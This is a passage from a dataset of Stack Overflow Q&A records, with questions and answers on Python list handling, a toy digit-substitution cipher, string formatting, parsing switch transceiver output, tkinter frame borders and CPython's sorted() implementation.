-ghana\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany\nhttps://www.sportingindex.com/spread-betting/rugby-union/france-top-14/group_a.ad22f34f-9cd6-47b4-a826-0c0f0dce7df2/lyon-v-toulouse\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland\nhttps://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay\n\n" ]
[ 2, 0 ]
[]
[]
[ "python", "selenium", "selenium_webdriver", "web_scraping", "xpath" ]
stackoverflow_0074593151_python_selenium_selenium_webdriver_web_scraping_xpath.txt
Q: Turning strings into integers from a mixed, nested list I need to turn certain values from a nested list of strings into integers and find the average of them for a programming assignment. The list looks like this: [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']] I've tried using for loops to turn them into integers but it returns TypeErrors or empty brackets. A: The format of the data suggests to me that it's something like a CSV where the first two columns are the player names and the remaining columns are scores, and that the ultimately desired result might be to preserve the names along with the average of the associated scores. Operating under that assumption, I might convert it into something like this: >>> data = [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']] >>> from statistics import mean >>> {' '.join(d[:2]): mean(map(int, d[2:])) for d in data} {'Ty Cobb': 392.3333333333333, 'Chipper Jones': 1812.3333333333333}
Turning strings into integers from a mixed, nested list
I need to turn certain values from a nested list of strings into integers and find the average of them for a programming assignment. The list looks like this: [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']] I've tried using for loops to turn them into integers but it returns TypeErrors or empty brackets.
[ "The format of the data suggests to me that it's something like a CSV where the first two columns are the player names and the remaining columns are scores, and that the ultimately desired result might be to preserve the names along with the average of the associated scores.\nOperating under that assumption, I might convert it into something like this:\n>>> data = [['Ty', 'Cobb', '178', '65', '934'], ['Chipper', 'Jones', '4532', '873', '32']]\n>>> from statistics import mean\n>>> {' '.join(d[:2]): mean(map(int, d[2:])) for d in data}\n{'Ty Cobb': 392.3333333333333, 'Chipper Jones': 1812.3333333333333}\n\n" ]
[ 1 ]
[]
[]
[ "for_loop", "list", "python" ]
stackoverflow_0074593519_for_loop_list_python.txt
Q: Function - encrypt key I'm trying to create a function that encrypts a number of 4 digits insert by the user. I was able to reach this: while True: num = int(input('Insira um valor entre 1000 e 9999: ')) if num<1000 or num>9999: print('Insira um valor válido.') else: break num_str = str(num) def encrypt(num): num_encrip = '' for i in num_str: match i: case '1': num_encrip = 'a' case '2': num_encrip = '*' case '3': num_encrip = 'I' case '4': num_encrip = 'D' case '5': num_encrip = '+' case '6': num_encrip = 'h' case '7': num_encrip = '@' case '8': num_encrip = 'c' case '9': num_encrip = 'Y' case '0': num_encrip = 'm' print(num_encrip, end='') encrypt(num_str) And it works fine, but I know this isn't very efficient and using lists should be better. And here I'm stuck because I can't adapt the code above with lists... nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0] chars = ['a', '*', 'I', 'D', '+', 'h', '@' 'c', 'Y', 'm'] while True: num = int(input('Insira um valor entre 1000 e 9999: ')) if num<1000 or num>9999: print('Insira um valor válido') else: break num_str = str(num) def encrypt(): pass encrypt(num_str) I'd writted so much thing inside the function encrip, but nothing works... I'm stuck... any help, please? I know I have to do a for loop... but what exactly? Thank you. A: With the 2 list, I'd suggest making a mapping from the numbers to the chars nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0] chars = ['a', '*', 'I', 'D', '+', 'h', '@', 'c', 'Y', 'm'] correspondances = dict(zip(nums, chars)) def encrip2(value): num_encrip = '' for c in value: num_encrip += correspondances[int(c)] print(num_encrip) And as the indexes are ints, you can directly use them as indexes into the chars chars = 'ma*ID+h@cY' def encrip2(value): num_encrip = '' for c in value: num_encrip += chars[int(c)] print(num_encrip)
Function - encrypt key
I'm trying to create a function that encrypts a number of 4 digits insert by the user. I was able to reach this: while True: num = int(input('Insira um valor entre 1000 e 9999: ')) if num<1000 or num>9999: print('Insira um valor válido.') else: break num_str = str(num) def encrypt(num): num_encrip = '' for i in num_str: match i: case '1': num_encrip = 'a' case '2': num_encrip = '*' case '3': num_encrip = 'I' case '4': num_encrip = 'D' case '5': num_encrip = '+' case '6': num_encrip = 'h' case '7': num_encrip = '@' case '8': num_encrip = 'c' case '9': num_encrip = 'Y' case '0': num_encrip = 'm' print(num_encrip, end='') encrypt(num_str) And it works fine, but I know this isn't very efficient and using lists should be better. And here I'm stuck because I can't adapt the code above with lists... nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0] chars = ['a', '*', 'I', 'D', '+', 'h', '@' 'c', 'Y', 'm'] while True: num = int(input('Insira um valor entre 1000 e 9999: ')) if num<1000 or num>9999: print('Insira um valor válido') else: break num_str = str(num) def encrypt(): pass encrypt(num_str) I'd writted so much thing inside the function encrip, but nothing works... I'm stuck... any help, please? I know I have to do a for loop... but what exactly? Thank you.
[ "With the 2 list, I'd suggest making a mapping from the numbers to the chars\nnums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\nchars = ['a', '*', 'I', 'D', '+', 'h', '@', 'c', 'Y', 'm']\ncorrespondances = dict(zip(nums, chars))\n\ndef encrip2(value):\n num_encrip = ''\n for c in value:\n num_encrip += correspondances[int(c)]\n print(num_encrip)\n\nAnd as the indexes are ints, you can directly use them as indexes into the chars\nchars = 'ma*ID+h@cY'\ndef encrip2(value):\n num_encrip = ''\n for c in value:\n num_encrip += chars[int(c)]\n print(num_encrip)\n\n" ]
[ 1 ]
[]
[]
[ "encryption", "function", "python" ]
stackoverflow_0074593536_encryption_function_python.txt
Q: Convert a dynamically sized list to a f string I'm trying to take a list that can be size 1 or greater and convert it to a string with formatting "val1, val2, val3 and val4" where you can have different list lengths and the last value will be formatted with an and before it instead of a comma. My current code: inputlist = ["val1", "val2", "val3"] outputstr = "" for i in range(len(inputlist)-1): if i == len(inputlist)-1: outputstr = outputstr + inputlist[i] elif i == len(inputlist)-2: outputstr = f"{outputstr + inputlist[i]} and " else: outputstr = f"{outputstr + inputlist[i]}, " print(f"Formatted list is: {outputstr}") Expected result: Formatted list is: val1, val2 and val3 A: join handles most. for inputlist in [["1"], ["one", "two"], ["val1", "val2", "val3"]]: if len(inputlist) <= 1: outputstr = "".join(inputlist) else: outputstr = " and ".join([", ".join(inputlist[:-1]), inputlist[-1]]) print(f"Formatted list is: {outputstr}") Produces Formatted list is: 1 Formatted list is: one and two Formatted list is: val1, val2 and val3 A: The range function in python does not include the last element, For example range(5) gives [0, 1, 2, 3, 4] only it does not add 5 in the list, So your code should be changed to something like this: inputlist = ["val1", "val2", "val3"] outputstr = "" for i in range(len(inputlist)): if i == len(inputlist)-1: outputstr = outputstr + inputlist[i] elif i == len(inputlist)-2: outputstr = f"{outputstr + inputlist[i]} and " else: outputstr = f"{outputstr + inputlist[i]}, " print(f"Formatted list is: {outputstr}") A: Decided to use string methods instead, and it worked perfectly. outputstr = str(inputlist).replace("'", "").strip("[]")[::-1].replace(",", " and"[::-1], 1)[::-1] print(f"With the following codes enabled: {outputstr}")
Convert a dynamically sized list to a f string
I'm trying to take a list that can be size 1 or greater and convert it to a string with formatting "val1, val2, val3 and val4" where you can have different list lengths and the last value will be formatted with an and before it instead of a comma. My current code: inputlist = ["val1", "val2", "val3"] outputstr = "" for i in range(len(inputlist)-1): if i == len(inputlist)-1: outputstr = outputstr + inputlist[i] elif i == len(inputlist)-2: outputstr = f"{outputstr + inputlist[i]} and " else: outputstr = f"{outputstr + inputlist[i]}, " print(f"Formatted list is: {outputstr}") Expected result: Formatted list is: val1, val2 and val3
[ "join handles most.\nfor inputlist in [[\"1\"], [\"one\", \"two\"], [\"val1\", \"val2\", \"val3\"]]:\n if len(inputlist) <= 1:\n outputstr = \"\".join(inputlist)\n else:\n outputstr = \" and \".join([\", \".join(inputlist[:-1]), inputlist[-1]])\n print(f\"Formatted list is: {outputstr}\")\n\nProduces\nFormatted list is: 1\nFormatted list is: one and two\nFormatted list is: val1, val2 and val3\n\n", "The range function in python does not include the last element,\nFor example range(5) gives [0, 1, 2, 3, 4] only it does not add 5 in the list,\nSo your code should be changed to something like this:\ninputlist = [\"val1\", \"val2\", \"val3\"]\noutputstr = \"\"\n\nfor i in range(len(inputlist)):\n if i == len(inputlist)-1:\n outputstr = outputstr + inputlist[i]\n elif i == len(inputlist)-2:\n outputstr = f\"{outputstr + inputlist[i]} and \"\n else:\n outputstr = f\"{outputstr + inputlist[i]}, \"\nprint(f\"Formatted list is: {outputstr}\")\n\n", "Decided to use string methods instead, and it worked perfectly.\noutputstr = str(inputlist).replace(\"'\", \"\").strip(\"[]\")[::-1].replace(\",\", \" and\"[::-1], 1)[::-1]\n print(f\"With the following codes enabled: {outputstr}\")\n\n" ]
[ 1, 0, 0 ]
[]
[]
[ "f_string", "list", "python" ]
stackoverflow_0074587672_f_string_list_python.txt
Q: Python convert switch data (text) to dict I have the following data, which I recieve via a ssh session to a switch. I wish to convert the input which is text to a dict for easy access and the possiblity to monitor certain values. I cannot get the data extracted without a ton of splits and regexes and still get stuck. Port : 1 Media Type : SF+_SR Vendor Name : VENDORX Part Number : SFP-10G-SR Serial Number : Gxxxxxxxx Wavelength: 850 nm Temp (Celsius) : 37.00 Status : Normal Low Warn Threshold : -40.00 High Warn Threshold : 85.00 Low Alarm Threshold : -50.00 High Alarm Threshold : 100.00 Voltage AUX-1/Vcc (Volts) : 3.27 Status : Normal Low Warn Threshold : 3.10 High Warn Threshold : 3.50 Low Alarm Threshold : 3.00 High Alarm Threshold : 3.60 Tx Power (dBm) : -3.11 Status : Normal Low Warn Threshold : -7.30 High Warn Threshold : 2.00 Low Alarm Threshold : -9.30 High Alarm Threshold : 3.00 Rx Power (dBm) : -4.68 Status : Normal Low Warn Threshold : -11.10 High Warn Threshold : 2.00 Low Alarm Threshold : -13.10 High Alarm Threshold : 3.00 Tx Bias Current (mA): 6.27 Status : Normal Low Warn Threshold : 0.00 High Warn Threshold : 12.00 Low Alarm Threshold : 0.00 High Alarm Threshold : 15.00 Port : 2 Media Type : SF+_SR Vendor Name : VENDORY Part Number : SFP-10G-SR Serial Number : Gxxxxxxxx Wavelength : 850 nm Temp (Celsius) : 37.00 Status : Normal ..... etc - till port 48 Which I want to convert to: [ { "port": "1", "vendor": "VENDORX", "media_type": "SF+_SR", "part_number": "SFP-10G-SR", "serial_number": "Gxxxxxxxx", "wavelength": "850 nm", "temp": { "value": "37.00", "status": "normal", # alarm threshold and warn threshold may be ignored }, "voltage_aux-1": { "value": "3.27", "status": "normal", # alarm threshold and warn threshold may be ignored }, "tx_power": { "value": "-3.11", "status": "normal", # alarm threshold and warn threshold may be ignored }, "rx_power": { "value": "-4.68", "status": "normal", # alarm threshold and warn threshold may be ignored }, "tx_bias_current": { "value": "6.27", "status": "normal", # alarm threshold and warn threshold may be ignored }, { "port": "2", "vendor": "VENDORY", "media_type": "SF+_SR", "part_number": "SFP-10G-SR", "serial_number": "Gxxxxxxxx", "wavelength": "850 nm", "temp": { "value": "37.00", "status": "normal", # alarm threshold and warn threshold may be ignored }, ...... etc } ] A: Updated (Complete rewrite and simplification). Here are some ideas for you -- adjust to taste. The solution herein tries to avoid using "domain specific knowledge" as much as possible. The only assumptions are: Empty lines don't matter. Indentation is meaningful. Keys are transformed to lowercase, and some content is removed (stuff in parentheses, 'name', 'threshold', and /...). When a line has multiple "key : value" pairs or is followed by an indented group of lines, that is a block of information pertaining to the first key. Ultimately, when a key has multiple values (e.g. 'port'), then these values are put together as a list. When a key has a value that is a single dict (like for 'temp'), then the first key of that dict (the same as the key itself) is replaced by 'value'. Thus, we will see: {'port': [{'port': 1, ...}, {'port': 2, ...}, ...]}, but {'temp': {'value': 37, ...}}. Records We start by splitting each line into (key, value) pairs and note the indentation of the line. The result is a list of records, each containing: (indent, [(k0, v0), ...]): import re def proc_kv(k, v): k = re.sub(r'\(.*\)', '', k.lower()) k = re.sub(r' (?:name|threshold)', '', k) k = re.sub(r'/\S+', '', k) k = '_'.join(k.strip().split()) for typ in (int, float): try: v = typ(v) break except ValueError: pass return k, v def proc_line(s): s = re.sub(r'\t', ' ' * 4, s) # handle tabs if any # split into one or more key-value pairs p = [e.strip() for e in re.split(r':', s)] if len(p) < 2: return None # if there are several pairs, use the largest space # to split '{v[i]} {k[i+1]}' p = [p[0]] + [ e for x in p[1:-1] for e in x.split(max(re.split(r'( +)', x)[1::2]), maxsplit=1) ] + [p[-1]] kv_pairs = [proc_kv(k, v) for k, v in zip(p[::2], p[1::2])] # figure out the indentation of that line indent = len(s) - len(s.lstrip(' ')) return indent, kv_pairs Example on your text: records = [r for r in [proc_line(s) for s in txt.splitlines()] if r] >>> records [(0, [('port', 1)]), (4, [('media_type', 'SF+_SR')]), (4, [('vendor', 'VENDORX')]), (4, [('part_number', 'SFP-10G-SR')]), (4, [('serial_number', 'Gxxxxxxxx')]), (4, [('wavelength', '850 nm')]), (4, [('temp', 37.0), ('status', 'Normal')]), (10, [('low_warn', -40.0), ('high_warn', 85.0)]), ... Note that not only keys but also values may contain spaces (e.g. 'Wavelength : 850 nm'). We decided to use the largest space to split intermediary '{v[i] k[i+]}' substrings. Thus: >>> proc_line(' a b : 34 nm c d : 4 ft') (2, [('a_b', '34 nm'), ('c_d', '4 ft')]) # but >>> proc_line(' a b : 34 nm c d : 4 ft') (2, [('a_b', 34), ('nm_c_d', '4 ft')]) Blocks We then construct a hierarchical representation of the records in way that takes indentation into account: def get_blocks(records, parent=None): indent, _ = records[0] starts = [i for i, (o_indent, _) in enumerate(records) if o_indent == indent] block = [] if parent is None else parent.copy() continuation_block = len(block) > 1 for i, j in zip(starts, starts[1:] + [len(records)]): _, kv = records[i] continuation_block &= (single_line := i + 1 == j) if continuation_block: block += kv elif single_line: block += [(kv[0][0], kv)] if len(kv) > 1 else kv else: block.append((kv[0][0], get_blocks(records[i+1:j], parent=kv))) return block Example on the records above (obtained from your txt): blocks = get_blocks(records) >>> blocks [('port', [('port', 1), ('media_type', 'SF+_SR'), ('vendor', 'VENDORX'), ('part_number', 'SFP-10G-SR'), ('serial_number', 'Gxxxxxxxx'), ('wavelength', '850 nm'), ('temp', [('temp', 37.0), ... Note the repeated first key in sub blocks (e.g. ('port', [('port', 1), ...]) and ('temp', [('temp', 37.0), ...]). Final structure We then transform the blocks hierarchical structure into a dict, with some ad-hoc logic (no clobbering (k, v) pairs that have the same key, etc.). And finally put all the pieces together in a proc_txt() function: def reshape(a): if isinstance(a, list) and len(a) == 1: a = a[0] if isinstance(a, dict): a = {'value' if i == 0 else k: v for i, (k, v) in enumerate(a.items())} return a def to_dict(blocks): if not isinstance(blocks, list): return blocks d = {} for k, v in blocks: d[k] = d.get(k, []) + [to_dict(v)] return {k: reshape(v) for k, v in d.items()} def proc_txt(txt): records = [r for r in [proc_line(s) for s in txt.splitlines()] if r] blocks = get_blocks(records) d = to_dict(blocks) return d Example on your text >>> proc_txt(txt) {'port': [{'port': 1, 'media_type': 'SF+_SR', 'vendor': 'VENDORX', 'part_number': 'SFP-10G-SR', 'serial_number': 'Gxxxxxxxx', 'wavelength': '850 nm', 'temp': {'value': 37.0, 'status': 'Normal', 'low_warn': -40.0, 'high_warn': 85.0, 'low_alarm': -50.0, 'high_alarm': 100.0}, ... ]}
Python convert switch data (text) to dict
I have the following data, which I recieve via a ssh session to a switch. I wish to convert the input which is text to a dict for easy access and the possiblity to monitor certain values. I cannot get the data extracted without a ton of splits and regexes and still get stuck. Port : 1 Media Type : SF+_SR Vendor Name : VENDORX Part Number : SFP-10G-SR Serial Number : Gxxxxxxxx Wavelength: 850 nm Temp (Celsius) : 37.00 Status : Normal Low Warn Threshold : -40.00 High Warn Threshold : 85.00 Low Alarm Threshold : -50.00 High Alarm Threshold : 100.00 Voltage AUX-1/Vcc (Volts) : 3.27 Status : Normal Low Warn Threshold : 3.10 High Warn Threshold : 3.50 Low Alarm Threshold : 3.00 High Alarm Threshold : 3.60 Tx Power (dBm) : -3.11 Status : Normal Low Warn Threshold : -7.30 High Warn Threshold : 2.00 Low Alarm Threshold : -9.30 High Alarm Threshold : 3.00 Rx Power (dBm) : -4.68 Status : Normal Low Warn Threshold : -11.10 High Warn Threshold : 2.00 Low Alarm Threshold : -13.10 High Alarm Threshold : 3.00 Tx Bias Current (mA): 6.27 Status : Normal Low Warn Threshold : 0.00 High Warn Threshold : 12.00 Low Alarm Threshold : 0.00 High Alarm Threshold : 15.00 Port : 2 Media Type : SF+_SR Vendor Name : VENDORY Part Number : SFP-10G-SR Serial Number : Gxxxxxxxx Wavelength : 850 nm Temp (Celsius) : 37.00 Status : Normal ..... etc - till port 48 Which I want to convert to: [ { "port": "1", "vendor": "VENDORX", "media_type": "SF+_SR", "part_number": "SFP-10G-SR", "serial_number": "Gxxxxxxxx", "wavelength": "850 nm", "temp": { "value": "37.00", "status": "normal", # alarm threshold and warn threshold may be ignored }, "voltage_aux-1": { "value": "3.27", "status": "normal", # alarm threshold and warn threshold may be ignored }, "tx_power": { "value": "-3.11", "status": "normal", # alarm threshold and warn threshold may be ignored }, "rx_power": { "value": "-4.68", "status": "normal", # alarm threshold and warn threshold may be ignored }, "tx_bias_current": { "value": "6.27", "status": "normal", # alarm threshold and warn threshold may be ignored }, { "port": "2", "vendor": "VENDORY", "media_type": "SF+_SR", "part_number": "SFP-10G-SR", "serial_number": "Gxxxxxxxx", "wavelength": "850 nm", "temp": { "value": "37.00", "status": "normal", # alarm threshold and warn threshold may be ignored }, ...... etc } ]
[ "Updated (Complete rewrite and simplification).\nHere are some ideas for you -- adjust to taste.\nThe solution herein tries to avoid using \"domain specific knowledge\" as much as possible. The only assumptions are:\n\nEmpty lines don't matter.\nIndentation is meaningful.\nKeys are transformed to lowercase, and some content is removed (stuff in parentheses, 'name', 'threshold', and /...).\nWhen a line has multiple \"key : value\" pairs or is followed by an indented group of lines, that is a block of information pertaining to the first key.\n\nUltimately, when a key has multiple values (e.g. 'port'), then these values are put together as a list. When a key has a value that is a single dict (like for 'temp'), then the first key of that dict (the same as the key itself) is replaced by 'value'. Thus, we will see:\n\n{'port': [{'port': 1, ...}, {'port': 2, ...}, ...]}, but\n{'temp': {'value': 37, ...}}.\n\nRecords\nWe start by splitting each line into (key, value) pairs and note the indentation of the line. The result is a list of records, each containing: (indent, [(k0, v0), ...]):\nimport re\n\ndef proc_kv(k, v):\n k = re.sub(r'\\(.*\\)', '', k.lower())\n k = re.sub(r' (?:name|threshold)', '', k)\n k = re.sub(r'/\\S+', '', k)\n k = '_'.join(k.strip().split())\n for typ in (int, float):\n try:\n v = typ(v)\n break\n except ValueError:\n pass\n return k, v\n\ndef proc_line(s):\n s = re.sub(r'\\t', ' ' * 4, s) # handle tabs if any\n # split into one or more key-value pairs\n p = [e.strip() for e in re.split(r':', s)]\n if len(p) < 2:\n return None\n # if there are several pairs, use the largest space\n # to split '{v[i]} {k[i+1]}'\n p = [p[0]] + [\n e for x in p[1:-1]\n for e in x.split(max(re.split(r'( +)', x)[1::2]), maxsplit=1)\n ] + [p[-1]]\n kv_pairs = [proc_kv(k, v) for k, v in zip(p[::2], p[1::2])]\n # figure out the indentation of that line\n indent = len(s) - len(s.lstrip(' '))\n return indent, kv_pairs\n\nExample on your text:\nrecords = [r for r in [proc_line(s) for s in txt.splitlines()] if r]\n>>> records\n[(0, [('port', 1)]),\n (4, [('media_type', 'SF+_SR')]),\n (4, [('vendor', 'VENDORX')]),\n (4, [('part_number', 'SFP-10G-SR')]),\n (4, [('serial_number', 'Gxxxxxxxx')]),\n (4, [('wavelength', '850 nm')]),\n (4, [('temp', 37.0), ('status', 'Normal')]),\n (10, [('low_warn', -40.0), ('high_warn', 85.0)]),\n ...\n\nNote that not only keys but also values may contain spaces (e.g. 'Wavelength : 850 nm'). We decided to use the largest space to split intermediary '{v[i] k[i+]}' substrings. Thus:\n>>> proc_line(' a b : 34 nm c d : 4 ft')\n(2, [('a_b', '34 nm'), ('c_d', '4 ft')])\n\n# but\n>>> proc_line(' a b : 34 nm c d : 4 ft')\n(2, [('a_b', 34), ('nm_c_d', '4 ft')])\n\nBlocks\nWe then construct a hierarchical representation of the records in way that takes indentation into account:\ndef get_blocks(records, parent=None):\n indent, _ = records[0]\n starts = [i for i, (o_indent, _) in enumerate(records) if o_indent == indent]\n block = [] if parent is None else parent.copy()\n continuation_block = len(block) > 1\n for i, j in zip(starts, starts[1:] + [len(records)]):\n _, kv = records[i]\n continuation_block &= (single_line := i + 1 == j)\n if continuation_block:\n block += kv\n elif single_line:\n block += [(kv[0][0], kv)] if len(kv) > 1 else kv\n else:\n block.append((kv[0][0], get_blocks(records[i+1:j], parent=kv)))\n return block\n\nExample on the records above (obtained from your txt):\nblocks = get_blocks(records)\n>>> blocks\n[('port',\n [('port', 1),\n ('media_type', 'SF+_SR'),\n ('vendor', 'VENDORX'),\n ('part_number', 'SFP-10G-SR'),\n ('serial_number', 'Gxxxxxxxx'),\n ('wavelength', '850 nm'),\n ('temp',\n [('temp', 37.0),\n ...\n\nNote the repeated first key in sub blocks (e.g. ('port', [('port', 1), ...]) and ('temp', [('temp', 37.0), ...]).\nFinal structure\nWe then transform the blocks hierarchical structure into a dict, with some ad-hoc logic (no clobbering (k, v) pairs that have the same key, etc.). And finally put all the pieces together in a proc_txt() function:\ndef reshape(a):\n if isinstance(a, list) and len(a) == 1:\n a = a[0]\n if isinstance(a, dict):\n a = {'value' if i == 0 else k: v for i, (k, v) in enumerate(a.items())}\n return a\n\ndef to_dict(blocks):\n if not isinstance(blocks, list):\n return blocks\n d = {}\n for k, v in blocks:\n d[k] = d.get(k, []) + [to_dict(v)]\n return {k: reshape(v) for k, v in d.items()}\n\ndef proc_txt(txt):\n records = [r for r in [proc_line(s) for s in txt.splitlines()] if r]\n blocks = get_blocks(records)\n d = to_dict(blocks)\n return d\n\nExample on your text\n>>> proc_txt(txt)\n{'port': [{'port': 1,\n 'media_type': 'SF+_SR',\n 'vendor': 'VENDORX',\n 'part_number': 'SFP-10G-SR',\n 'serial_number': 'Gxxxxxxxx',\n 'wavelength': '850 nm',\n 'temp': {'value': 37.0,\n 'status': 'Normal',\n 'low_warn': -40.0,\n 'high_warn': 85.0,\n 'low_alarm': -50.0,\n 'high_alarm': 100.0},\n ...\n]}\n\n" ]
[ 2 ]
[]
[]
[ "data_conversion", "python" ]
stackoverflow_0074591658_data_conversion_python.txt
Q: Frame border disappears when focus is lost on window I have a tkinter window from which I open another window. This window contains a Frame which is located inside a Canvas. I'm going to make a picture from the window contents but the problem is that the frame border deactivates itself when the focus isn't on the window or I click the meant button for that and therefore is not present in the picture (this happens only in the real code). In this example the frame border isn't visible after the window is created. By clicking the "Save" button which has no function here, it becomes visible. When the focus is lost on this window the frame disappears but is activated again after clicking somewhere in this window. I have not the slightest idea why the frame border should behave like this at all. Is there a way to constantly display it? import tkinter as tk from tkinter import ttk def open(): window = tk.Toplevel() canvas = tk.Canvas(window, bd=0, highlightthickness=0) canvas.grid(row=0, column=0) frame = tk.Frame(canvas, bg="red") frame.config(highlightthickness=5, highlightcolor="black") frame.grid(row=0, column=0) text = tk.Label(frame, text="Text") text.grid(row=0, column=0) save_button = ttk.Button(frame, text="Save") save_button.grid(row=1, column=0, columnspan=1, pady=5) root = tk.Tk() open_button = ttk.Button(root, command=lambda: [open()], text="Open") open_button.grid(row=0, column=0) root.mainloop() A: The highlightthickness and highlightcolor options are doing exactly what they are designed to do: they only appear when the frame has the focus. It is not designed to be the border of the frame, but rather an indicator of when the frame has focus. If you want a permanent border then you should use borderwidth and relief options, and/or put your frame inside another frame that uses any color you want for the border color.
Frame border disappears when focus is lost on window
I have a tkinter window from which I open another window. This window contains a Frame which is located inside a Canvas. I'm going to make a picture from the window contents but the problem is that the frame border deactivates itself when the focus isn't on the window or I click the meant button for that and therefore is not present in the picture (this happens only in the real code). In this example the frame border isn't visible after the window is created. By clicking the "Save" button which has no function here, it becomes visible. When the focus is lost on this window the frame disappears but is activated again after clicking somewhere in this window. I have not the slightest idea why the frame border should behave like this at all. Is there a way to constantly display it? import tkinter as tk from tkinter import ttk def open(): window = tk.Toplevel() canvas = tk.Canvas(window, bd=0, highlightthickness=0) canvas.grid(row=0, column=0) frame = tk.Frame(canvas, bg="red") frame.config(highlightthickness=5, highlightcolor="black") frame.grid(row=0, column=0) text = tk.Label(frame, text="Text") text.grid(row=0, column=0) save_button = ttk.Button(frame, text="Save") save_button.grid(row=1, column=0, columnspan=1, pady=5) root = tk.Tk() open_button = ttk.Button(root, command=lambda: [open()], text="Open") open_button.grid(row=0, column=0) root.mainloop()
[ "The highlightthickness and highlightcolor options are doing exactly what they are designed to do: they only appear when the frame has the focus. It is not designed to be the border of the frame, but rather an indicator of when the frame has focus.\nIf you want a permanent border then you should use borderwidth and relief options, and/or put your frame inside another frame that uses any color you want for the border color.\n" ]
[ 1 ]
[]
[]
[ "frame", "python", "tkinter", "tkinter_canvas" ]
stackoverflow_0074593595_frame_python_tkinter_tkinter_canvas.txt
Q: Where is the actual "sorted" method being implemented in CPython and what is it doing here? Viewing the source code of CPython on GitHub, I saw the method here: https://github.com/python/cpython/blob/main/Python/bltinmodule.c And more specifically: static PyObject * builtin_sorted(PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames) { PyObject *newlist, *v, *seq, *callable; /* Keyword arguments are passed through list.sort() which will check them. */ if (!_PyArg_UnpackStack(args, nargs, "sorted", 1, 1, &seq)) return NULL; newlist = PySequence_List(seq); if (newlist == NULL) return NULL; callable = _PyObject_GetAttrId(newlist, &PyId_sort); if (callable == NULL) { Py_DECREF(newlist); return NULL; } assert(nargs >= 1); v = _PyObject_FastCallKeywords(callable, args + 1, nargs - 1, kwnames); Py_DECREF(callable); if (v == NULL) { Py_DECREF(newlist); return NULL; } Py_DECREF(v); return newlist; } I am not a C master, but I don't see any implementation of any of the known sorting algorithms, let alone the special sort that Python uses (I think it's called Timsort? - correct me if I'm wrong) I would highly appreciate if you could help me "digest" this code and understand it, because as of right now I've got: PyObject *newlist, *v, *seq, *callable; Which is creating a new list - even though list is mutable no? then why create a new one? and creating some other pointers, not sure why... then we unpack the rest of the arguments as the comment suggests, if it doesn't match the arguments there (being the function 'sorted' for example) then we break out.. I am pretty sure I am reading this all completely wrong, so I stopped here... Thanks for the help in advanced, sorry for the multiple questions but this block of code is blowing my mind and learning to read this would help me a lot! A: The actual sorting is done by list.sort. sorted simply creates a new list from whatever iterable argument it is given, sorts that list in-place, then returns it. A pure Python implementation of sorted might look like def sorted(itr, *, key=None): newlist = list(itr) newlist.sort(key=key) return newlist Most of the C code is just boilerplate for working with the underlying C data structures, detecting and propagating errors, and doing memory management. The actual sorting algorithm is spread throughout Objects/listobject.c; start here. If you are really interested in what the algorithm is, rather than how it is implemented in C, you may want to start with https://github.com/python/cpython/blob/main/Objects/listsort.txt instead. A: list sort implementation isn't there. This is a wrapper function fetching PyId_sort from there: callable = _PyObject_GetAttrId(newlist, &PyId_sort); object.h contains a macro using token pasting to define the PyId_xxx objects #define _Py_IDENTIFIER(varname) _Py_static_string(PyId_##varname, #varname) ... and I stopped digging after that. There could be more macro magic involved in order to enforce a coherent naming through the whole python codebase. The implementation is located here: https://github.com/python/cpython/blob/main/Objects/listobject.c More precisely around line 2240 static PyObject * list_sort_impl(PyListObject *self, PyObject *keyfunc, int reverse) /*[clinic end generated code: output=57b9f9c5e23fbe42 input=cb56cd179a713060]*/ { Comments read: /* An adaptive, stable, natural mergesort. See listsort.txt. * Returns Py_None on success, NULL on error. Even in case of error, the * list will be some permutation of its input state (nothing is lost or * duplicated). */ Now it takes some effort to understand the details of the algorithm but it's there.
Where is the actual "sorted" method being implemented in CPython and what is it doing here?
Viewing the source code of CPython on GitHub, I saw the method here: https://github.com/python/cpython/blob/main/Python/bltinmodule.c And more specifically: static PyObject * builtin_sorted(PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames) { PyObject *newlist, *v, *seq, *callable; /* Keyword arguments are passed through list.sort() which will check them. */ if (!_PyArg_UnpackStack(args, nargs, "sorted", 1, 1, &seq)) return NULL; newlist = PySequence_List(seq); if (newlist == NULL) return NULL; callable = _PyObject_GetAttrId(newlist, &PyId_sort); if (callable == NULL) { Py_DECREF(newlist); return NULL; } assert(nargs >= 1); v = _PyObject_FastCallKeywords(callable, args + 1, nargs - 1, kwnames); Py_DECREF(callable); if (v == NULL) { Py_DECREF(newlist); return NULL; } Py_DECREF(v); return newlist; } I am not a C master, but I don't see any implementation of any of the known sorting algorithms, let alone the special sort that Python uses (I think it's called Timsort? - correct me if I'm wrong) I would highly appreciate if you could help me "digest" this code and understand it, because as of right now I've got: PyObject *newlist, *v, 